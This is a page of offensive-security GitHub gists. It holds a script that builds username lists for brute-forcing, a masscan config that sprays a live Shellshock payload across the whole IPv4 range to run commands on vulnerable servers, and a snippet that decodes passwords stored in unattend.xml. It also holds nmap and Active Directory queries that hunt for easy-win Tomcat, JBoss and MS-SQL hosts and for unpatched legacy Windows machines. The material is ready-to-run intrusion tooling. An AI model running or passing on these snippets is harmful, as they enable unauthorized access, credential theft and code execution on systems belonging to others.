@breakersall
breakersall / gist:f966fc4e25ba9b231c30
Last active August 29, 2015 14:06
Parse Facebook namelist into usable lists for username bruteforcing
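#First.Last
# Output file for the generated First.Last names
$Unamestream = New-Object System.IO.StreamWriter("names.txt")
# Input lists: one first name / last name per line
$FNames = Get-Content fname_10.txt
$LNames = Get-Content lname_10.txt
foreach ($FName in $FNames)
{
    foreach ($LName in $LNames)
    {
        $Name = "$FName" + "." + "$LName"
        $Unamestream.WriteLine($Name)
    }
}
# Flush and release the output file
$Unamestream.Close()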
breakersall / gist:9f5250f76295626d6e12
Last active August 29, 2015 14:06
ShellShock Anti-Shock - masscan
#InfoSec good deed fairy
#Original from shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)
target = 0.0.0.0/0
port = 80
banners = true
http-user-agent = InfosecFairy
http-header = Cookie:() { :; }; apt-get update -y; apt-get upgrade -y; yum update bash -y
http-header = Host:() { :; }; apt-get update -y; apt-get upgrade -y; yum update bash -y
http-header = Referer:() { :; }; apt-get update -y; apt-get upgrade -y; yum update bash -y
breakersall / gist:71479c9b68be425b8198
Created July 28, 2014 18:31
Decode Base64 for unattend
From: http://blog.compower.org/2013/08/05/recover-the-non-plain-password-from-your-unattend-xml/
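# Placeholder: replace "string" with the Base64 password value from unattend.xml
$pass = "string"
# The value is Base64 over UTF-16LE text, so decode the bytes as Unicode
[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($pass))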
#Find tomcat/jboss,ms-sql - Uses carlos' https://github.com/darkoperator
nmap -Pn -p 1433,80,8080,8008,8000,8443,443,8000-8010 -sV -Pn -T4 --min-hostgroup 256 --min-parallelism 32 --script=http-title,ms-sql-empty-password -iL <subnetst2scan> -oX easy-wins.xml
$nmaphosts = Import-NmapXML -NmapXML easy-wins.xml -InfoType Hosts
$nmaphosts | Where-Object {$_.Ports.Service.Product -match "tomcat"} | select-object Ipv4Address | Out-File Tomcat-Hosts.txt
$nmaphosts | Where-Object {$_.Ports.Service.Product -match "jboss"} | select-object Ipv4Address | Out-File Jboss-Hosts.txt
$nmaphosts | Where-Object {$_.Ports.Service.Product -match "Mbedthis"} | Select-Object IPv4Address | Out-File iDRAC-Hosts.txt
$nmaphosts | Where-Object {$_.Ports.Service.Product -match "ms-sql-server"} | select-object Ipv4Address | Out-File MS-SQL-Hosts.txt
#Uses carlos' https://github.com/darkoperator
$hosts = Get-AuditDSComputerAccount -DomainController <IP> -Credential (Get-Credential)
$hosts | Where-Object {(($_.OperatingSystem -match "XP" -and $_.ServicePack -eq "Service Pack 1") -or ($_.OperatingSystem -match "XP" -and $_.ServicePack -eq "Service Pack 2") -or ($_.OperatingSystem -match "XP" -and $_.ServicePack -eq "")) -or ($_.OperatingSystem -match "2000") -or (($_.OperatingSystem -match "2003" -and $_.ServicePack -eq "") -or ($_.OperatingSystem -match "2003" -and $_.ServicePack -eq "Service Pack 1"))}